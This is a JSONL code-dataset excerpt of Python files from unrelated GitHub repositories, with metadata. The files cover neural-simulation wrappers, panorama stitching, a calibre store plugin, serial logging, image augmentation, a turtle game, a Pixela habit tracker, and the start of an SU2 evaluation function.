response_handler.send_missing_params_response(missing_key)\n # playfab_get_acc_info = PROFILE(x_auth_header)\n # playfab_get_acc_info.get_account_info(playfab_get_acc_info_dto)\n playfab_get_acc_info_dto = GET_ACCOUNT_INFO_DTO(\n playfab_id = playfab_id,\n ignore_missing_title_activation = False\n )\n playfab_get_acc_info = PROFILE()\n playfab_get_acc_info.get_account_info(playfab_get_acc_info_dto)\n return response_handler.send_common_response(request_dto.KeyId, playfab_get_acc_info)","repo_name":"this-post/Insecure-Game-Server","sub_path":"GetAccountInfo/get_account_info.py","file_name":"get_account_info.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15792018501","text":"# -*- coding: utf-8 -*-\n\nfrom brainpy import errors\nfrom brainpy.base.base import Base\nfrom brainpy.base import collector\n\nmath = None\n\n__all__ = [\n 'Function',\n]\n\n\ndef _check_node(node):\n if not isinstance(node, Base):\n raise errors.BrainPyError(f'Element in \"nodes\" must be an instance of '\n f'{Base.__name__}, but we got {type(node)}.')\n\n\ndef _check_var(var):\n global math\n if math is None: from brainpy import math\n if not isinstance(var, math.ndarray):\n raise errors.BrainPyError(f'Element in \"dyn_vars\" must be an instance of '\n f'{math.ndarray.__name__}, but we got {type(var)}.')\n\n\nclass Function(Base):\n \"\"\"The wrapper for Python functions.\n\n Parameters\n ----------\n f : function\n The function to wrap.\n nodes : optional, Base, sequence of Base, dict\n The nodes in the defined function ``f``.\n dyn_vars : optional, ndarray, sequence of ndarray, dict\n The dynamically changed variables.\n name : optional, str\n The function name.\n \"\"\"\n\n def __init__(self, f, nodes=None, dyn_vars=None, name=None):\n # initialize \n # ---\n self._f = f\n if name is None:\n name = self.unique_name(type_=f.__name__ if hasattr(f, '__name__') else 'Function')\n super(Function, self).__init__(name=name)\n\n # nodes \n # ---\n if nodes is not None:\n self.implicit_nodes = collector.Collector()\n if isinstance(nodes, Base):\n nodes = (nodes,)\n if isinstance(nodes, (tuple, list)):\n for i, node in enumerate(nodes):\n _check_node(node)\n self.implicit_nodes[f'_node{i}'] = node\n elif isinstance(nodes, dict):\n for node in nodes.values():\n _check_node(node)\n self.implicit_nodes.update(nodes)\n else:\n raise ValueError(f'\"nodes\" only support list/tuple/dict of {Base.__name__}, '\n f'but we got {type(nodes)}: {nodes}')\n\n # variables\n # ---\n if dyn_vars is not None:\n self.implicit_vars = collector.TensorCollector()\n global math\n if math is None: from brainpy import math\n if isinstance(dyn_vars, math.ndarray):\n dyn_vars = (dyn_vars,)\n if isinstance(dyn_vars, (tuple, list)):\n for i, v in enumerate(dyn_vars):\n _check_var(v)\n self.implicit_vars[f'_var{i}'] = v\n elif isinstance(dyn_vars, dict):\n for v in dyn_vars.values():\n _check_var(v)\n self.implicit_vars.update(dyn_vars)\n else:\n raise ValueError(f'\"dyn_vars\" only support list/tuple/dict of {math.ndarray.__name__}, '\n f'but we got {type(dyn_vars)}: {dyn_vars}')\n\n def __call__(self, *args, **kwargs):\n return self._f(*args, **kwargs)\n","repo_name":"Ppl91/BrainPy","sub_path":"brainpy/base/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"43187215141","text":"import numpy as np\nimport cv2\nimport random\nfrom tqdm import tqdm\nfrom utils import solve_homography, warping\n\nrandom.seed(999)\n\ndef matches(img1, img2):\n orb = cv2.ORB_create(nfeatures=1000)\n kp_a, desc_a = orb.detectAndCompute(img1, None)\n kp_b, desc_b = orb.detectAndCompute(img2, None)\n\n bf = cv2.BFMatcher(cv2.NORM_HAMMING)\n matches = bf.knnMatch(desc_a, desc_b, k=2)\n\n good_matches = []\n for match_1, match_2 in matches:\n if match_1.distance < 0.8 * match_2.distance:\n good_matches.append(match_1)\n \n #filter good matching keypoints \n good_kp_a = []\n good_kp_b = []\n\n for match in good_matches:\n good_kp_a.append(kp_a[match.queryIdx].pt) # keypoint in image A\n good_kp_b.append(kp_b[match.trainIdx].pt) # matching keypoint in image B\n return np.array(good_kp_a).astype(np.int), np.array(good_kp_b).astype(np.int)\n\ndef transform_with_homography(H, points):\n ones = np.ones((points.shape[0], 1))\n points = np.concatenate((points, ones), axis=1)\n transformed_points = H.dot(points.T)\n transformed_points = transformed_points / (transformed_points[2,:][np.newaxis, :])\n transformed_points = transformed_points[0:2,:].T\n\n return transformed_points\n\ndef compute_outlier(H, points_a, points_b, threshold=3):\n outliers_count = 0\n\n points_img_b_transformed = transform_with_homography(H, points_b)\n\n x = points_a[:, 0]\n y = points_a[:, 1]\n x_hat = points_img_b_transformed[:, 0]\n y_hat = points_img_b_transformed[:, 1]\n distance = np.sqrt(np.power((x_hat - x), 2) + np.power((y_hat - y), 2)).reshape(-1)\n for dis in distance:\n if dis > threshold:\n outliers_count += 1\n return outliers_count\n\ndef ransac_for_homography(matches_1, matches_2):\n\n all_matches = matches_1.shape[0]\n # RANSAC parameters\n prob_success = 0.99\n sample_points_size = 5\n ratio_of_outlier = 0.5\n N = int(np.log(1.0 - prob_success)/np.log(1 - (1 - ratio_of_outlier)**sample_points_size))\n\n lowest_outlier = all_matches # Worst case: all the points are outliers\n best_H = None\n\n for i in range(N):\n rand_index = np.random.choice(all_matches, sample_points_size, replace=False)\n H = solve_homography(matches_2[rand_index], matches_1[rand_index])\n outliers_count = compute_outlier(H, matches_1, matches_2)\n if outliers_count < lowest_outlier:\n best_H = H\n lowest_outlier = outliers_count\n\n return best_H\n\ndef panorama(imgs):\n \"\"\"\n Image stitching with estimated homograpy between consecutive\n :param imgs: list of images to be stitched\n :return: stitched panorama\n \"\"\"\n h_max = max([x.shape[0] for x in imgs])\n w_max = sum([x.shape[1] for x in imgs])\n\n # create the final stitched canvas\n dst = np.zeros((h_max, w_max, imgs[0].shape[2]), dtype=np.uint8)\n dst[:imgs[0].shape[0], :imgs[0].shape[1]] = imgs[0]\n last_best_H = np.eye(3)\n out = None\n\n # for all images to be stitched:\n for idx in range(len(imgs) - 1):\n im1 = imgs[idx]\n im2 = imgs[idx + 1]\n\n # TODO: 1.feature detection & matching\n matches_1, matches_2 = matches(im1, im2)\n\n # TODO: 2. apply RANSAC to choose best H\n H = ransac_for_homography(matches_1, matches_2)\n\n # TODO: 3. chain the homographies\n last_best_H = last_best_H.dot(H)\n\n # TODO: 4. apply warping\n dst = warping(im2, dst, last_best_H, 'b')\n out = dst\n\n return out\n\nif __name__ == \"__main__\":\n # ================== Part 4: Panorama ========================\n # TODO: change the number of frames to be stitched\n FRAME_NUM = 3\n imgs = [cv2.imread('../resource/frame{:d}.jpg'.format(x)) for x in range(1, FRAME_NUM + 1)]\n output4 = panorama(imgs)\n cv2.imwrite('output4.png', output4)","repo_name":"come880412/ComputerVision_NTUEE_2022Spring","sub_path":"hw3/hw3/src/part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"21718596913","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import (unicode_literals, division, absolute_import, print_function)\nstore_version = 1 # Needed for dynamic plugin loading\n\n__license__ = 'GPL 3'\n__copyright__ = '2011, John Schember '\n__docformat__ = 'restructuredtext en'\n\nfrom calibre.gui2.store.basic_config import BasicStoreConfig\nfrom calibre.gui2.store.opensearch_store import OpenSearchOPDSStore\nfrom calibre.gui2.store.search_result import SearchResult\n\nclass ArchiveOrgStore(BasicStoreConfig, OpenSearchOPDSStore):\n\n open_search_url = 'http://bookserver.archive.org/catalog/opensearch.xml'\n web_url = 'http://www.archive.org/details/texts'\n\n # http://bookserver.archive.org/catalog/\n\n def search(self, query, max_results=10, timeout=60):\n for s in OpenSearchOPDSStore.search(self, query, max_results, timeout):\n s.detail_item = 'http://www.archive.org/details/' + s.detail_item.split(':')[-1]\n s.price = '$0.00'\n s.drm = SearchResult.DRM_UNLOCKED\n yield s\n\n def get_details(self, search_result, timeout):\n '''\n The opensearch feed only returns a subset of formats that are available.\n We want to get a list of all formats that the user can get.\n '''\n from calibre import browser\n from contextlib import closing\n from lxml import html\n\n br = browser()\n with closing(br.open(search_result.detail_item, timeout=timeout)) as nf:\n idata = html.fromstring(nf.read())\n formats = ', '.join(idata.xpath('//p[@id=\"dl\" and @class=\"content\"]//a/text()'))\n search_result.formats = formats.upper()\n\n return True\n","repo_name":"sss/calibre-at-bzr","sub_path":"src/calibre/gui2/store/stores/archive_org_plugin.py","file_name":"archive_org_plugin.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"83"} +{"seq_id":"18294172949","text":"import cv2\n\n# play with this script to figure out which camera you should use\n\n# source:\n# https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html#capture-video-from-camera\n\n# edit this value\nsource_index = 0\n\n\ncap = cv2.VideoCapture(source_index)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Sijiba/GameWatcher-SmashUltimate","sub_path":"testVideoSource.py","file_name":"testVideoSource.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40661574137","text":"import unittest\n\nimport reader\n\n\nclass TestReader(unittest.TestCase):\n\n def test_read_json_request(self):\n data = {\"tips\": [\"tip1\", \"tip2\"],\n \"usageInfo\": {\"action_id_1\": {\"usageCount\": 1,\n \"lastUsedTimestamp\": 10},\n \"action_id_2\": {\"usageCount\": 2,\n \"lastUsedTimestamp\": 12}},\n \"ideName\": \"IU\",\n \"bucket\": \"2\"}\n bucket, user_events, tips = reader.read_request_json(data)\n self.assertEqual(2, bucket)\n self.assertEqual({(\"actions.action.invoked\", \"action_id_1\"): (10, 1),\n (\"actions.action.invoked\", \"action_id_2\"): (12, 2)}, user_events)\n self.assertEqual([\"tip1\", \"tip2\"], tips)\n\n def test_read_tip_to_event(self):\n file_name = __file__[:-14] + \"test_html_to_event.csv\"\n tip_to_action_ids_dict, action_id_to_tips_dict = reader.read_tip_to_event(file_name)\n\n self.assertEqual({\"tip1.html\": [\"action_id_1\"], \"tip2.html\": [\"action_id_1\", \"action_id_3\"]}, tip_to_action_ids_dict)\n self.assertEqual({\"action_id_1\": [\"tip1.html\", \"tip2.html\"], \"action_id_3\": [\"tip2.html\"]}, action_id_to_tips_dict)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"JetBrains-Research/feature-recommendations","sub_path":"docker/test/reader_test.py","file_name":"reader_test.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"15151440097","text":"from re import split\nimport threading\nimport time\nimport serial\nimport SDtoXML\nimport numpy as np\n\nclass SerialThread():\n\n def __init__(self, bridge, isReader:bool, isReceptor:bool):\n self.ser = serial.Serial(timeout=0)\n self.bridge = bridge\n self.isReceptor = isReceptor\n if isReader:\n self.thr = threading.Thread(target=self.loopRead, daemon=True)\n else:\n self.thr = threading.Thread(target=self.playLog, daemon=True)\n self.period = 0 #log player precisa de um período\n self.splitMessages = None\n def startSerial(self, serial_port, baudrate):\n self.ser.port = serial_port\n self.ser.baudrate = baudrate\n self.ser.open()\n if self.ser.is_open:\n self.thr.stop_condition = False\n self.thr.start()\n def loopRead(self):\n while(self.ser.is_open and not self.thr.stop_condition):\n #Delay para acumular mais dados no buffer de recepção\n time.sleep(0.05)\n readLength = self.ser.in_waiting\n s = self.ser.read(readLength)\n if (s):\n if self.isReceptor:\n self.bridge.serialStringsDict[self.ser.port] = s.decode(\"ISO-8859-1\")\n # self.bridge.componentsQueue.put(lambda: self.bridge.updateComponents(s))\n self.bridge.updateComponents(s)\n # self.bridge.serialStringsDict[self.ser.port] = s.hex()\n self.bridge.setConsoleText.emit(self.bridge.serialStringsDict[self.ser.port], str(self.ser.port))\n else:\n self.bridge.serialStringsDict[self.ser.port] = s.decode(\"ISO-8859-1\")\n self.bridge.setConsoleText.emit(self.bridge.serialStringsDict[self.ser.port], str(self.ser.port))\n # self.data_stream = property(\"text\")\n\n\n def playLog(self):\n if self.splitMessages != None and self.period != 0:\n for msg in self.splitMessages:\n if len(msg) > 4:\n msg = np.delete(msg, 4) #deleta o timeDelta da msg do datalogger\n msg = np.insert(msg[2:], 0, [85,83,80], axis = 0)\n self.ser.write(msg)\n time.sleep(self.period/100)\n\n def closeSerial(self):\n try:\n if self.thr.is_alive:\n self.thr.stop_condition = True\n self.ser.close()\n except Exception:\n pass\n\nclass LogConversionThread():\n def __init__(self, bridge, params:SDtoXML.XMLParams):\n self.thr = threading.Thread(target=SDtoXML.convertLog, args=(bridge,params), daemon=True)\n def start(self):\n self.thr.start()","repo_name":"artur-chagas/ltv-pyqt","sub_path":"formulaThread.py","file_name":"formulaThread.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4427542510","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 18:27:21 2021\n\n@author: Purnendu Mishra\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\n\nfrom skimage.io import imread\n\n\n#%%\ndef random_translation(x, y, alpha = 0.2):\n \n h, w = x.shape[:2]\n \n y[:,0] *= w\n y[:,1] *= h\n \n # The maximum translation along each dimension\n tx = np.random.uniform(-alpha, alpha) * w # translation along image width\n ty = np.random.uniform(-alpha, alpha) * h # translation along image height\n \n # The translation matrix\n T = np.array([[1,0,tx], [0,1,ty]], dtype = np.float32)\n \n # The image translation\n xT = cv2.warpAffine(x, T, (w, h))\n \n # Translation of hand keypoints\n ## Converting into homogenous coordinate system\n T_ = np.append(T , np.array([[0,0,1]], dtype = np.float32), axis = 0)\n \n K = y.shape[0]\n # Converting keypoints coordinates into homogenous coordinate system\n y_ = np.append(y.T, np.ones((1,K), dtype = np.float32), axis = 0) # shape = 3 X K\n yT = np.matmul(T_, y_)[:2,:].T\n \n # Limit the keypoints between 0 and h or w\n # yT[:,0] = yT[:,0].clip(min = 0, max = w - 1) / w\n # yT[:,1] = yT[:,1].clip(min = 0, max = h - 1) / h\n \n for i in range(K):\n a = yT[i, 0]\n b = yT[i, 1]\n \n if a > w - 1 or b > h - 1:\n yT[i] = 0.\n elif a < 0. or b < 0.:\n yT[i] = 0. \n else:\n pass\n \n \n yT[:,0] /= w\n yT[:,1] /= h\n \n return (xT, yT)\n\n\ndef random_rotation(x, y, max_theta = 30):\n \n theta = np.random.uniform(-1.,1.) * max_theta # Angle in degrees\n \n scale = np.random.uniform(0.25, 1.0) + 0.25 \n \n h, w = x.shape[:2]\n \n y[:,0] *= w\n y[:,1] *= h\n \n # Rotating with respect to center of the image\n Rr = cv2.getRotationMatrix2D((w//2, h//2), theta, scale)\n \n # The rotated image will be\n xR = cv2.warpAffine(x, Rr, (w,h))\n \n # The modified Rotation matrix\n Rm = np.append(Rr, np.array([[0,0,1]]), axis = 0)\n \n # Rotate the keypoints\n K = y.shape[0] # No. of keypoints\n y_ = np.append(y.T, np.ones((1,K), dtype = np.float32), axis = 0)\n \n # The rotated keypoints\n yR = np.matmul(Rm, y_)[:2].T\n \n for i in range(K):\n a = yR[i, 0]\n b = yR[i, 1]\n \n if a > w - 1 or b > h - 1:\n yR[i] = 0.\n elif a < 0. or b < 0.:\n yR[i] = 0. \n else:\n pass\n \n # Normalize the keypoints\n yR[:,0] /= w\n yR[:,1] /= h\n \n return (xR, yR)\n\n#%%\nif __name__=='__main__':\n \n \n img_path = Path.cwd()/'test_img.jpg'\n\n x = imread(img_path)\n image = x.copy()\n y = np.load('test_img_labels.npy')\n\n h, w = x.shape[:2]\n \n if np.random.rand() > 0.5:\n print('random translation')\n x, y = random_translation(x = x, y = y, alpha = 0.2)\n \n if np.random.rand() > 0.5: \n print('random rotation')\n x, y = random_rotation(x = x, y = y, max_theta = 45)\n \n y[:,0] *= w\n y[:,1] *= h\n \n px , py = y.T\n \n fig = plt.figure(figsize = (10,10))\n plt.subplot(1,2,1)\n plt.imshow(image)\n plt.subplot(1,2,2)\n plt.imshow(x)\n plt.scatter(px, py, c='r')\n plt.show()\n\n ","repo_name":"puruBHU/ComputerVisionCodes","sub_path":"AffineTransforms/test_rotation_and_translation.py","file_name":"test_rotation_and_translation.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5188616220","text":"from enum import auto\nfrom enum import unique\nfrom nf_common_source.code.nf.types.column_types import ColumnTypes\n\n\n@unique\nclass ExtendedTDiagramobjectsColumnTypes(\n ColumnTypes):\n T_DIAGRAMOBJECTS_COMPOSITE_EA_GUIDS = auto()\n T_DIAGRAMOBJECTS_EA_HUMAN_READABLE_NAMES = auto()\n\n def __column_name(\n self) \\\n -> str:\n column_name = \\\n column_name_mapping[self]\n\n return \\\n column_name\n\n column_name = \\\n property(\n fget=__column_name)\n\n\ncolumn_name_mapping = \\\n {\n ExtendedTDiagramobjectsColumnTypes.T_DIAGRAMOBJECTS_COMPOSITE_EA_GUIDS: 't_diagramobjects_composite_ea_guids',\n ExtendedTDiagramobjectsColumnTypes.T_DIAGRAMOBJECTS_EA_HUMAN_READABLE_NAMES: 't_diagramobjects_ea_human_readable_names'\n }\n","repo_name":"boro-alpha/nf_ea_common_tools","sub_path":"nf_ea_common_tools_source/b_code/nf_ea_common/common_knowledge/column_types/extended_t/extended_t_diagramobjects_column_types.py","file_name":"extended_t_diagramobjects_column_types.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24851733347","text":"from evado.models import CursoProfesor, AplicarUniversoEncuestaPersona\n\n\ndef profesor_evaluacion_alumno(documento, ue):\n materias_profesor = CursoProfesor.objects.filter(rut__iexact=documento)\n total_encuestas = 0\n total_respuestas = 0\n for x in materias_profesor:\n codigo = x.codigo\n encuestas = AplicarUniversoEncuestaPersona.objects.filter(\n universo_encuesta=ue,\n curso_alumno__cod_curso__iexact=codigo,\n finalizado__isnull=False\n )\n for e in encuestas:\n total_respuestas += e.total_respuestas\n total_encuestas += encuestas.count()\n docente = materias_profesor.first()\n lista = map(lambda x: x.codigo, materias_profesor)\n total_alumnos = AplicarUniversoEncuestaPersona.objects.filter(\n universo_encuesta=ue,\n curso_alumno__cod_curso__in=lista\n ).distinct()\n return {\n 'Nombres': docente.nombres, 'Apellidos': docente.apellidos, 'Rut': docente.rut,\n 'Total Encuestas': total_encuestas, 'Total Respuestas': total_respuestas,\n 'Total Materias': materias_profesor.count(), 'Total Alumnos': total_alumnos.count()\n }\n","repo_name":"j-alexander-acosta/AAGESuite","sub_path":"evado/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13897270563","text":"import requests\nfrom datetime import datetime\n\nUSERNAME = \"YOUR_USERNAME\"\nTOKEN = \"YOUR_CREATED_TOKEN\"\nGRAPH_ID = \"YOUR_GRAPH_NAME\"\n\npixela_endpoint = \"https://pixe.la/v1/users\"\n\nuser_params = {\n \"token\": TOKEN,\n \"username\": USERNAME,\n \"agreeTermsOfService\": \"yes/no\",\n \"notMinor\": \"yes/no\",\n}\n\n# Creating a user\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\n# Creating a graph\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\ngraph_params = {\n \"id\": GRAPH_ID,\n \"name\": \"Program Graph\",\n \"unit\": \"Hours\",\n \"type\": \"float\",\n \"color\": \"sora\",\n}\n\ngraph_headers = {\n \"X-USER-TOKEN\": TOKEN\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_params, headers=graph_headers)\n# print(response.text)\n\n# Creating a Habit Pixel in graph\npixelcreation_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}\"\n\ntoday_date = datetime.now().strftime(\"%Y%m%d\")\n\npixel_data = {\n \"date\": today_date,\n \"quantity\": \"2\",\n}\n\nresponse = requests.post(url=pixelcreation_endpoint, headers=graph_headers, json=pixel_data)\nprint(response.text)\n\n# Update a Habit pixel in graph\nday_update = \"20231212\"\n\nupdate_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{day_update}\"\n\npixel_update = {\n \"quantity\": \"3\"\n}\n\n# response = requests.put(url=update_endpoint, headers=graph_headers, json=pixel_update)\n# print(response.text)\n\n# Delete a Habit pixel data in graph\nday_delete = \"20231212\"\ndelete_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{day_delete}\"\n\n# response = requests.delete(url=delete_endpoint, headers=graph_headers)\n# print(response.text)\n","repo_name":"JonatasViscaino/100-days-of-code-Python","sub_path":"Day 37 - Habit tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74431956361","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.nn.init as init\nimport numpy as np\n\n\nclass LSTM(nn.Module):\n \"\"\"\n 自定义双通道 LSTM 模型\n 一个通道用来 随机embedding\n 一个通道用来 预训练embedding\n \"\"\"\n\n def __init__(self, args):\n super(LSTM, self).__init__()\n self.args = args\n self.hidden_dim = args.lstm_hidden_dim\n self.lstm_num_layers = args.lstm_num_layers\n V = args.embed_num # 词的个数\n D = args.embed_dim # 词的维度(一个词的向量)\n C = args.class_num # 多少个分类\n\n # nn.Embedding 设置词向量,生成随机矩阵,V行,D列,V*D\n self.embed = nn.Embedding(V, D)\n # 如果使用预训练embedding 想要微调权重 就需要下面这句\n # self.embed.weight.requires_grad=True\n\n \"\"\"\n input(seq_len, batch, input_size)\n input包含了 这三个参数,但是喂数据给模型的时候是包括了这些数据的,所以不用管\n 所以 这里只输入了 D 词的维度,因为 我们输入的数据是 是包括完整的数据的 是一个 feature\n \n 因为没有定义 h0 c0 所以这里要输入 具体的 hidden_size num_layers 然后系统自动定义\n lstm的 h0 和 c0 如果不初始化,PyTorch默认初始化为全零的张量\n h0(num_layers * num_directions, batch, hidden_size)\n c0(num_layers * num_directions, batch, hidden_size)\n \n hidden_size:隐藏层的特征维度\n num_layers:lstm隐层的层数,默认为1 双向lstm层数翻倍\n num_directions: 就是 方向,是单向lstm(1) 还是 双向lstm(2)\n bias:False则bih=0和bhh=0. 默认为True\n batch_first:True则输入输出的数据格式为 (batch, seq, feature)\n dropout:除最后一层,每一层的输出都进行dropout,默认为: 0\n \"\"\"\n # lstm\n self.lstm = nn.LSTM(D, self.hidden_dim, dropout=args.dropout, num_layers=self.lstm_num_layers)\n # 将lstm的所有权重矩阵进行初始化\n # torch.nn.init.xavier_normal_(tensor, gain=1) 正态分布~N(0,std)\n if args.lstm_weight_init:\n print(\"初始化 W 矩阵\")\n init.xavier_normal(self.lstm.all_weights[0][0], gain=np.sqrt(args.lstm_weight_init_value))\n init.xavier_normal(self.lstm.all_weights[0][1], gain=np.sqrt(args.lstm_weight_init_value))\n\n # 进行dropout处理 避免过拟合\n # 定义dropout\n self.dropout = nn.Dropout(args.dropout)\n # 对 embedding进行dropout\n self.embed_dropout = nn.Dropout(args.embed_dropout)\n # 线性层\n self.hidden2lable = nn.Linear(self.hidden_dim, C)\n\n # 重载 前向传播 自定义前向传播\n def forward(self, x):\n # 前向传播 通过模型计算预测值\n embed = self.embed(x) # (N, W, D)\n # embed = self.embed_dropout(embed)\n x = embed.view(len(x), embed.size(1), -1)\n\n lstm_out, _ = self.lstm(x)\n # lstm_out, self.hidden = self.lstm(x, self.hidden)\n # 返回输入矩阵input的转置,交换维度dim0和dim1。输入张量与输出张量共享内存\n lstm_out = torch.transpose(lstm_out, 0, 1)\n lstm_out = torch.transpose(lstm_out, 1, 2)\n\n # 激活函数\n lstm_out = F.tanh(lstm_out)\n # 池化\n lstm_out = F.max_pool1d(lstm_out, lstm_out.size(2)).squeeze(2)\n # dropout\n lstm_out = self.dropout(lstm_out)\n # 线性层\n logit = self.hidden2lable(lstm_out)\n return logit\n","repo_name":"xhjcxxl/NLP_Models","sub_path":"CNN_Classificaion_all_models/models/model_LSTM.py","file_name":"model_LSTM.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34937858839","text":"import turtle\nimport random\n\nwn = turtle.Screen()\nwn.bgcolor(\"blue\")\nroad = turtle.Turtle()\nroad.color(\"black\")\nroad.speed(0)\nroad.penup()\nroad.goto(-100,140)\nfor move in range(11):\n road.write(move, align='center')\n road.right(90)\n for num in range(8):\n road.penup()\n road.forward(10)\n road.pendown()\n road.forward(10)\n road.penup()\n road.backward(160)\n road.left(90)\n road.forward(20)\nroad.hideturtle() \n \nt = turtle.Turtle()\nt.right(90)\nt.color(\"black\")\nt.penup()\nt.goto(180,140)\nt.setheading(90)\nt.write(\"START\",move=True,align=\"right\",font=(\"Freestyle Script\",15,\"normal\")) \nt.hideturtle()\njacob = turtle.Turtle()\njacob.color('red')\njacob.shape('turtle')\njacob.penup()\njacob.goto(-160, 120)\njacob.pendown()\nkara = turtle.Turtle()\nkara.color('green')\nkara.shape('turtle')\nkara.penup()\nkara.goto(-160, 90)\nkara.pendown()\ndeodat = turtle.Turtle()\ndeodat.shape('turtle')\ndeodat.color('orange')\ndeodat.penup()\ndeodat.goto(-160, 60)\ndeodat.pendown()\ncrystal = turtle.Turtle()\ncrystal.shape('turtle')\ncrystal.color('purple')\ncrystal.penup()\ncrystal.goto(-160, 30)\ncrystal.pendown()\nnaseera = turtle.Turtle()\nnaseera.shape('turtle')\nnaseera.color('white')\nnaseera.penup()\nnaseera.goto(-160,0)\nnaseera.pendown()\nnames = [jacob, kara, deodat, crystal, naseera]\nnames2= [\"jacob\",\"kara\",\"deodat\",\"crystal\",\"naseera\"]\ndef race():\n holdB = 0\n jacobB = 0\n karaB = 0\n deodatB = 0\n crystalB = 0\n naseeraB = 0\n for i in range(54):\n for i in range(5):\n names[i].fd(random.randrange(1,10))\n if names[i].xcor() >= 110:\n break\n if names[i].xcor() >= 110:\n print(\"\" + names2[i]+\" \" + \"Wins!!!\")\nrace()","repo_name":"sadenrichards/turtlerace","sub_path":"turtlerace.py","file_name":"turtlerace.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18569450933","text":"import os, sys, shutil, copy, time, subprocess\nfrom .. import run as su2run\nfrom .. import io as su2io\nfrom .. import util as su2util\nfrom ..io import redirect_folder, redirect_output\n\n\n# ----------------------------------------------------------------------\n# Main Function Interface\n# ----------------------------------------------------------------------\n\n\ndef function(func_name, config, state=None):\n \"\"\"val = SU2.eval.func(func_name,config,state=None)\n\n Evaluates the aerodynamics and geometry functions.\n\n Wraps:\n SU2.eval.aerodynamics()\n SU2.eval.geometry()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh need not be deformed.\n Updates config and state by reference.\n Redundancy if state.FUNCTIONS is not empty.\n\n Executes in:\n ./DIRECT or ./GEOMETRY\n\n Inputs:\n func_name - SU2 objective function name or 'ALL'\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n If func_name is 'ALL', returns a Bunch() of\n functions with keys of objective function names\n and values of objective function floats.\n Otherwise returns a float.\n \"\"\"\n\n # initialize\n state = su2io.State(state)\n\n # check for multiple objectives\n multi_objective = type(func_name) == list\n\n # func_name_string is only used to check whether the function has already been evaluated.\n func_name_string = func_name\n if multi_objective:\n func_name_string = func_name[0]\n\n # redundancy check\n if not func_name_string in state[\"FUNCTIONS\"]:\n\n # Aerodynamics\n if multi_objective or func_name == \"ALL\":\n aerodynamics(config, state)\n\n elif func_name in su2io.historyOutFields:\n if (\n su2io.historyOutFields[func_name][\"TYPE\"] == \"COEFFICIENT\"\n or su2io.historyOutFields[func_name][\"TYPE\"] == \"D_COEFFICIENT\"\n ):\n aerodynamics(config, state)\n\n # Stability\n elif func_name in su2io.optnames_stab:\n stability(config, state)\n\n # Multipoint\n elif func_name in su2io.optnames_multi:\n multipoint(config, state)\n\n # Geometry\n elif func_name in su2io.optnames_geo:\n geometry(func_name, config, state)\n\n else:\n raise Exception(\n \"unknown function name, %s. Please check config_template.cfg for updated list of function names\"\n % func_name\n )\n\n #: if not redundant\n\n # prepare output\n if func_name == \"ALL\":\n func_out = state[\"FUNCTIONS\"]\n elif multi_objective:\n # If combine_objective is true, use the 'combo' output.\n func_out = state[\"FUNCTIONS\"][\"COMBO\"]\n else:\n func_out = state[\"FUNCTIONS\"][func_name]\n\n if func_name_string in config[\"OPT_OBJECTIVE\"]:\n marker = config[\"OPT_OBJECTIVE\"][func_name_string][\"MARKER\"]\n if func_name_string in su2io.per_surface_map:\n name = su2io.per_surface_map[func_name_string] + \"_\" + marker\n if name in state[\"FUNCTIONS\"]:\n func_out = state[\"FUNCTIONS\"][name]\n\n return copy.deepcopy(func_out)\n\n\n#: def function()\n\n\n# ----------------------------------------------------------------------\n# Aerodynamic Functions\n# 